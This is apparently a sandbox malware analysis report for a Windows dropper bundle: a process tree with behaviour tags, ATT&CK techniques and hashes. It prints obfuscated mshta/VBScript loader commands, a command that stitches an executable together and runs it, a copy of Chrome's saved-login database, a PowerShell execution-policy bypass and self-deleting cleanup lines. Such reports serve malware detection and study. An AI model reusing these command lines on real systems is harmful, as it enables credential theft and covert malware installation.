C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "ojgDUNNP7dpScLvppbbgG2vM.exe" -F10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\vE8VUtPiqqT3L6yzMj8eK3re.exe"C:\Users\Admin\Pictures\Adobe Films\vE8VUtPiqqT3L6yzMj8eK3re.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SBEOR.tmp\vE8VUtPiqqT3L6yzMj8eK3re.tmp"C:\Users\Admin\AppData\Local\Temp\is-SBEOR.tmp\vE8VUtPiqqT3L6yzMj8eK3re.tmp" /SL5="$503B8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\vE8VUtPiqqT3L6yzMj8eK3re.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-HUSEC.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-HUSEC.tmp\DYbALA.exe" /S /UID=27109⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Google\HAOHKYHASN\foldershare.exe"C:\Program Files\Google\HAOHKYHASN\foldershare.exe" /VERYSILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\ce-5ad83-201-6cda7-d45e4e97d7334\Laekonojaefi.exe"C:\Users\Admin\AppData\Local\Temp\ce-5ad83-201-6cda7-d45e4e97d7334\Laekonojaefi.exe"10⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\d9-5cc91-cbf-8c7bc-dd8cd7c5fcfca\Wukociloly.exe"C:\Users\Admin\AppData\Local\Temp\d9-5cc91-cbf-8c7bc-dd8cd7c5fcfca\Wukociloly.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ts40pgjj.51h\GcleanerEU.exe /eufive & exit11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ts40pgjj.51h\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ts40pgjj.51h\GcleanerEU.exe /eufive12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exeC:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exe /qn CAMPAIGN="654"12⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634980352 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe & exit11⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exeC:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe"C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe" -u13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5rggwis.5ez\gcleaner.exe /mixfive & exit11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Users\Admin\AppData\Local\Temp\j5rggwis.5ez\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j5rggwis.5ez\gcleaner.exe /mixfive12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2w0efph3.pfj\autosubplayer.exe /S & exit11⤵
-
C:\Users\Admin\Pictures\Adobe Films\nSunlzyh6D8YVl3uc9TpGptO.exe"C:\Users\Admin\Pictures\Adobe Films\nSunlzyh6D8YVl3uc9TpGptO.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffb6f4ddec0,0x7ffb6f4dded0,0x7ffb6f4ddee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,7793733273046101032,8156918462856293311,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7264_254379555" --mojo-platform-channel-handle=1640 /prefetch:810⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0121df51a9f7cad03.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0121df51a9f7cad03.exeTue0121df51a9f7cad03.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01fbc1763fd5e9540.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01fbc1763fd5e9540.exeTue01fbc1763fd5e9540.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01e66a46d03f9.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01e66a46d03f9.exeTue01e66a46d03f9.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0016286477.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\0016286477.exe"C:\Users\Admin\AppData\Local\Temp\0016286477.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue01e66a46d03f9.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01e66a46d03f9.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue01e66a46d03f9.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\xGgxfdTAZIxYAbC9nMWHnOyd.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\FCB6.exeC:\Users\Admin\AppData\Local\Temp\FCB6.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wozvxrip\wozvxrip.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEBB.tmp" "c:\Users\Admin\AppData\Local\Temp\wozvxrip\CSC9C29C1B0FC9648DDB5E6F4F438958159.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
-
C:\Users\Admin\AppData\Local\Temp\3675.exeC:\Users\Admin\AppData\Local\Temp\3675.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
- Suspicious behavior: AddClipboardFormatListener
-
C:\Users\Admin\AppData\Local\Temp\B16D.exeC:\Users\Admin\AppData\Local\Temp\B16D.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B16D.exeC:\Users\Admin\AppData\Local\Temp\B16D.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\CC68.exeC:\Users\Admin\AppData\Local\Temp\CC68.exe2⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\D35F.exeC:\Users\Admin\AppData\Local\Temp\D35F.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\DA65.exeC:\Users\Admin\AppData\Local\Temp\DA65.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8336 -s 8083⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\EFB3.exeC:\Users\Admin\AppData\Local\Temp\EFB3.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im EFB3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EFB3.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im EFB3.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\FCE.exeC:\Users\Admin\AppData\Local\Temp\FCE.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\2A5C.exeC:\Users\Admin\AppData\Local\Temp\2A5C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\4E8F.exeC:\Users\Admin\AppData\Local\Temp\4E8F.exe2⤵
-
C:\Program Files (x86)\Wuz7\servicesdfjdgba.exe"C:\Program Files (x86)\Wuz7\servicesdfjdgba.exe"2⤵
- Modifies Internet Explorer settings
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T5E8P.tmp\Tue0164db7e438.tmp"C:\Users\Admin\AppData\Local\Temp\is-T5E8P.tmp\Tue0164db7e438.tmp" /SL5="$1020E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe" /SILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-IM4MD.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-IM4MD.tmp\postback.exe" ss12⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4521733.exe"C:\Users\Admin\AppData\Roaming\4521733.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\4120637.exe"C:\Users\Admin\AppData\Roaming\4120637.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\581531.exe"C:\Users\Admin\AppData\Roaming\581531.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1395190.exe"C:\Users\Admin\AppData\Roaming\1395190.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8071603.exe"C:\Users\Admin\AppData\Roaming\8071603.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 2563⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Roaming\2777786.exe"C:\Users\Admin\AppData\Roaming\2777786.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 22B83E15617A7F5FEC5D75D0C62A4616 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 784CF0AEABFA7A084372E760DCCE22392⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 014A5C043F571222B48C86DA8A48C528 E Global\MSI00002⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Modify Registry
9Disabling Security Tools
4Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue01aa9c65fe676f9.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01152ad4a43.exeMD5
d60a08a6456074f895e9f8338ea19515
SHA19547c405520a033bd479a0d20c056a1fdacf18af
SHA256d12662f643b6daf1cfca3b45633eb2bf92c7928dbd0670718e5d57d24fb851e0
SHA512b6cbd259e84826ccd2c99c7a66d90f1c2201d625eea6adcd37205e8adf4383ae44306ae1df682fb81b7e38c18bce017a69fba5141702263e4d480b4a30106c8e
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01152ad4a43.exeMD5
d60a08a6456074f895e9f8338ea19515
SHA19547c405520a033bd479a0d20c056a1fdacf18af
SHA256d12662f643b6daf1cfca3b45633eb2bf92c7928dbd0670718e5d57d24fb851e0
SHA512b6cbd259e84826ccd2c99c7a66d90f1c2201d625eea6adcd37205e8adf4383ae44306ae1df682fb81b7e38c18bce017a69fba5141702263e4d480b4a30106c8e
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue011ad96d4eb.exeMD5
27aa9c1ec3e1b97a80e85754e8804975
SHA142d15be066cc0f4df76bdaf02011e726fe280ca8
SHA256cf6526590e00c45b2215a7ac2dbea4b17ed6a6e8f09e41e566d3fff60b9642c3
SHA512b48b513777d3de57f9aa1e3051bf05f5058ee317df37461a2fbf399751c7686fd78527c327af7e2b504ebfb32ac4ede79fdc4d1f28ebc3bee380935cc1f283d4
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue011ad96d4eb.exeMD5
27aa9c1ec3e1b97a80e85754e8804975
SHA142d15be066cc0f4df76bdaf02011e726fe280ca8
SHA256cf6526590e00c45b2215a7ac2dbea4b17ed6a6e8f09e41e566d3fff60b9642c3
